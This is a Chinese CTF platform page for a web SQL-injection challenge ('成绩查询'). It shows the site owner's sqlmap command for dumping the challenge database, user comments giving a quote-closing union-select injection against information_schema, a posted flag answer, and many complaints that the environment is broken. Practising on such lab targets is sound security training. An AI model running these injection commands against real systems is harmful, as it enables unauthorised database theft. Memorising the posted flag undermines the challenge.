列表

详情


成绩查询

平台   WEB   已通过

题目作者: 未知

一  血: ‌‌‌‌‌npfs

一血奖励: 1金币

解  决: 8210

提  示: 来源山科大ctf

站长题解:

sqlmap --batch -D skctf --dump --forms -u http://114.67.175.224:11508/index.php

去做题

toto 👍0

环境用不了服了smg


toto 👍0

环境用不了服了smg


use 👍0

--batch -D skctf --dump


15826978220 👍0

单引号闭合,联合注入


3166235571 👍0

flag{467bbedc241402f5b4e28f37ace7ef82}


不聪明小孩 👍0

-1 'union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database()#找到列名skctf_flag,才能从fl4g的表里面找到对应的列的值


DrKeen 👍0

hackbar有问题id=1'做不到,用burp搞了


SmallH 👍1

是不是真的环境被改了呀?真的对照WriteUp一步一步来还是没回显,每次注入就全部重置,是不是考虑退一下金币了???


15614005380 👍0

我用sqlmap做出来了


gboyd 👍0

我1’ 1” 1‘) 1”) 1 都试过了为啥都显示正常啊!!!!!


NPC 👍2

环境绝对有问题,照着答案注入都无回显!!!退金币!